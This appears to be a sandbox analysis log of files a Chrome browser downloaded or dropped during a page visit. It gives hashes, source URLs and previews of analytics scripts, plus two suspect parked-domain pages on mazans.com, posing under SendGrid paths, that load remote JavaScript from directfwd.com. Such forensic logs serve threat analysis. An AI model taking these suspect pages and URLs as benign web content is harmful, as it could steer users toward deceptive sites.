                                                                                                                                                                                                                                                                                                                                                                          Preview:"use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[464],{9254:function(t,n,i){function e(t,n){var i,e;return"boolean"==typeof(null==n?void 0:n.enabled)?n.enabled:null===(e=null===(i=null==t?void 0:t.__default)||void 0===i?void 0:i.enabled)||void 0===e||e}i.d(n,{n:function(){return e}})},3162:function(t,n,i){i.r(n),i.d(n,{LegacyDestination:function(){return G},ajsDestinations:function(){return S}});var e=i(5163),r=i(4122),o=i(94),s=i(8404),a=i(1494),u=i(204),c=i(6096),l=i(9254),d=i(5944),h=i(8044),v=i(3098),f=i(3061),p=i(6338),m=i(7566),g=i(7070);function y(t){return t.toLowerCase().replace(".","").replace(/\s+/g,"-")}function w(t,n){return void 0===n&&(n=!1),n?btoa(t).replace(/=/g,""):void 0}function b(t,n,i,r){return(0,e.mG)(this,void 0,Promise,(function(){var o,s,a,u,c,l;return(0,e.Jh)(this,(function(d){switch(d.label){case 0:o=y(n),s=w(o,r),a=(0,m.Kg)(),u="".concat(a,"/integrations/").concat(null!=s?s:o,"/").concat(i,"/").conc
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):7
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.950212064914747
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Sn:S
                                                                                                                                                                                                                                                                                                                                                                          MD5:D97623D172F087D9640DA9ACD38830FF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:515BD358BB7D990930F0E2B3DE399DB1787A2567
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FE04A9DC88D3F3BE8D4F6BC63A9A80F45A4C6D8460E7551DAB849457C091920A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CE6A1969F698A616663F1A19CCFA12A37A4F6D782432D8A08AEB7879EFD3E2BECF168422EA66BC47E74F6BA865EFAAE6EABE3C4FABA280D7A21F3A94D7C55DA1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<p></p>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):7
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.950212064914747
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Sn:S
                                                                                                                                                                                                                                                                                                                                                                          MD5:D97623D172F087D9640DA9ACD38830FF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:515BD358BB7D990930F0E2B3DE399DB1787A2567
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FE04A9DC88D3F3BE8D4F6BC63A9A80F45A4C6D8460E7551DAB849457C091920A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CE6A1969F698A616663F1A19CCFA12A37A4F6D782432D8A08AEB7879EFD3E2BECF168422EA66BC47E74F6BA865EFAAE6EABE3C4FABA280D7A21F3A94D7C55DA1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://c.6sc.co/
                                                                                                                                                                                                                                                                                                                                                                          Preview:<p></p>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://alb.reddit.com/rp.gif?ts=1731515353679&id=t2_i1au5p4&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=59612d52-27d8-4d62-91ae-7a523b33ca67&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc=
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2228
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                                                                                                                                                                                                                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):726
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.855795869039044
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:YyNALv2i47S1HAxU823XheXoIFFQbSJN1Kvu6exBA9QmA9abcA9FXQEBaeo4czgr:YyN0e7swU82nhIISJLKcxBYQmY7YFBoa
                                                                                                                                                                                                                                                                                                                                                                          MD5:B78F37C2B9D6DAE1A4E8AA118B9B553F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:23E99D683AA72B0F0785AD9E860974A63E8C58F4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:12A015D3B6EF4084B854C1A2601F511E2A843B8015992A4F9DCFFC20D699FB85
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D74E2D2D368AEC1F97A1CE2394D28EA789175DE78CB17D87F5013A1C42D407C8B22A65FB8F3111CD71647106672713175842B6F70749E02496BBD2D4E8EE6967
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdn.segment.com/v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/settings
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"integrations":{"Repeater":{"versionSettings":{"componentTypes":["server"]},"type":"server"},"Segment.io":{"apiKey":"1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj","unbundledIntegrations":["Marketo V2"],"addBundledMetadata":true,"maybeBundledConfigIds":{},"versionSettings":{"version":"4.4.7","componentTypes":["browser"]},"retryQueue":false}},"plan":{"track":{"__default":{"enabled":true,"integrations":{}}},"identify":{"__default":{"enabled":true}},"group":{"__default":{"enabled":true}}},"edgeFunction":{},"analyticsNextEnabled":true,"middlewareSettings":{},"enabledMiddleware":{},"metrics":{"sampleRate":0.1},"legacyVideoPluginsEnabled":false,"remotePlugins":[],"autoInstrumentationSettings":{"disableTraffic":false,"sampleRate":0.1}}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (46623)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):439157
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.549552837391692
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:nEN+LA2hBa34steMHiewMevXjN7UstPdev:n5AospFHZevy
                                                                                                                                                                                                                                                                                                                                                                          MD5:219DB1FCDA5B3433D847EB596DD74BB5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5F9C79EFD2021C5B66496466063C071EF41F25A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6442DB144B3AFC574E893EFE682397840E85308147F214C3DFD622A712086E66
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:47ADB54773F3FC0DEED2E2C8E2C87AD91343E3156B028A0242986B8BD9E09B295A6EDACD61CEE3F5A399F8EA23236F4410E1CFC21FA013A5A31C3DD89DA7445D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-5C72XHK
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"61",. . "macros":[{"function":"__e"},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"notice_behavior"},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"cmapi_cookie_privacy"},{"function":"__k","vtp_decodeCookie":true,"vtp_name":"tneSignUpVals"},{"function":"__jsm","vtp_javascript":["template","(function(){return JSON.parse(",["escape",["macro",3],8,16],")})();"]},{"function":"__jsm","vtp_javascript":["template","(function(){return ",["escape",["macro",4],8,16],".packages.e})();"]},{"function":"__jsm","vtp_javascript":["template","(function(){return ",["escape",["macro",4],8,16],".packages.mc})();"]},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"_ga"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",["escape",["macro",7],8,16],";return
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (508)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1260
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4430232956828695
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:md7pIgWcbMdeEB1OeQSfmFtHXRWYxRWZgRK+uKF69F2sPg6F/ysbVFyIF/IFKe+p:a7phWzFZcVwYxwTlL2gg6FKWrSuCMrlz
                                                                                                                                                                                                                                                                                                                                                                          MD5:E75E5BA140B1C7E6EA79786633C1BA0D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7A0ED3EB87905134623782643465B91B1B8E9E07
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A2091F1FF92CC073E178DCA31707853E0CC6CD913A5344A8978F040FA373EFA6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:68603B9868C58D8F5010B591FBA926433AC3EB5F0B7F0C45F90972C9410138FB9E7D013C7F3F3E33C71F6EBF9ECF4E8132AABC4EBC6D47FA43682B54E2051E0D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://munchkin.marketo.net/munchkin.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: prod r944. */. (function(b){if(!b.Munchkin){var c=b.document,e=[],k,l={fallback:"163"},g=[164,null],m=function(){if(!k){for(;0<e.length;){var f=e.shift();b.MunchkinTracker[f[0]].apply(b.MunchkinTracker,f[1])}k=!0}},n=function(f){var a=c.createElement("script"),b=c.getElementsByTagName("base")[0]||c.getElementsByTagName("script")[0];a.type="text/javascript";a.async=!0;a.src=f;a.onreadystatechange=function(){"complete"!==this.readyState&&"loaded"!==this.readyState||m()};a.onload=m;b.parentNode.insertBefore(a,b)},.h={CLICK_LINK:"CLICK_LINK",VISIT_WEB_PAGE:"visitWebPage",init:function(b){var a;a=l[b];if(!a&&0<g.length){a=b;var c=0,d;if(0!==a.length)for(d=0;d<a.length;d+=1)c+=a.charCodeAt(d);a=g[c%g.length]}a||(a=l.fallback);e.push(["init",arguments]);"150"===a?n("//munchkin-cdn.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32768)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):170630
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2652083279763096
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:Kuuxfmq5UbTUHnFMiNuGUT2aAbaBH8NtC4:KuuEqcTmuGmA24
                                                                                                                                                                                                                                                                                                                                                                          MD5:AB50D7306699553DE9ED6B4CFFC87685
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CB9DB6F9B7DFBFF53A2BBD177D75F03ADD3EFD62
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E583948C2E170FF3820AE7B0894751F76D7023D524289BA64B676758A4B0D12A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BC7F7DD43BF827C3BF1F1278E2E66551C681F4DBFA0DE94DD909D8AE451C4D720B94489A2AF81E7B79D2C8C6986A4E686EB2795EB5DF601222A8CDDEB3B2CA0A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://assets.adobedtm.com/a62564f453ce/3a3a2543ac65/launch-7021ca0c1852.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:// For license information, see `https://assets.adobedtm.com/a62564f453ce/3a3a2543ac65/launch-7021ca0c1852.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-08-21T00:40:34Z",turbineBuildDate:"2023-02-22T20:37:26Z",turbineVersion:"27.5.0"},environment:{id:"ENa13ed59d66ac47e3869ceadbb394d46a",stage:"production"},dataElements:{"6sense - Industry":{modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=JSON.parse(_satellite.getVar("6sense - Company Details"));return e?.company?.industry}}},"6sense - NAICS":{modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=JSON.parse(_satellite.getVar("6sense - Company Details"));return e?.company?.naics}}},"6sense - Confidence":{modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=JSON.parse(_satellite.getVar("6sense - Company Details"));return e?.confidence}}},"6sense - Employee Range":{modu
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):110633
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.444679358436924
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:7Fb5Xyuw2f8jlZpU/diXsxaI2hxFjYtZFl0W8Tdw9GpRcFkeuWSyNSjx50cFuQv+:T0xU6ZVn7wNUyPQ2
                                                                                                                                                                                                                                                                                                                                                                          MD5:5B53A174469542CF3548E40583C3F1E8
                                                                                                                                                                                                                                                                                                                                                                          SHA1:AC03471BEE72F4493218683289FD337A33413182
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EB1CED271679B94863261DB0B6DC150A53B987360B657794D35A6DA534904D27
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F51B1CCACD72F0C618199DF12A592182DCCFAED42A361D10C16490448A5F223C73FFD5BAAB43272BFEC76A8FCB8407A81BCC3BB9896794B119F4EBD6ECAFFA13
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://euob.powerrobotflower.com/sxp/i/c6a47dab391ea1c8a8b2709f8479395d.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(t){var n={};function r(e){if(n[e])return n[e].exports;var i=n[e]={i:e,l:!1,exports:{}};return t[e].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"_",{value:!0})},r.t=function(t,n){if(1&n&&(t=r(t)),8&n)return t;if(4&n&&"object"==typeof t&&t&&t._)return t;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:t}),2&n&&"string"!=typeof t)for(var i in t)r.d(e,i,function(n){return t[n]}.bind(null,i));return e},r.n=function(t){var n=t&&t._?function(){return t.default}:function(){return t};return r.d(n,"a",n),n},r.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},r.p="",r(r.s=5)}([function(t,n,r){var e=r(1),i=window,a=i.document,o=i.location,c=encodeURIComponent,u=decodeURIComponent,f=i.navigat
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):558800
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                                                                                                                                                                                          MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-site.lc-e2ee9b88808de4233ff130f26c4dc422-lc.min.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4092
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.685563567268828
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:12oZc5WT9BvpXKZhUyXuXsk8hLb3Dhm2ykOoqH:12oZc5WNXK3XuXW5+H
                                                                                                                                                                                                                                                                                                                                                                          MD5:D77D244C3931889ACF848D46D0A270F0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:298AFE7EFCCB4632523F3C6B33E8C950B58C6EEB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:D3C9DCB83C9307D83DD95DA9013D2E7B91B6EEDA1ECC9F7B98A037BB406EC722
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7D364072AEE2C13940C7732C0A6676F2DBAB9EAE790D2ECEC4F4C4F75B37FC9E6A560EECF2320DE9F0EC7F5BBDD1DAC507601E0B246C778D177BBDF861C1A4CC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(w,d,c,k,a,b,t,e) {. var cs = d.currentScript;. if (cs) {. var uo = cs.getAttribute('data-ueto');. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {. w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});. }. }.})(window, document, false, true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://www.clarity.ms/tag/uet/'+i+'';.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.clarity; };.. var r = 40;.. var cl = function() {.. if (r-- < 1) retu
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (606)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):11133
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.520280429902031
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
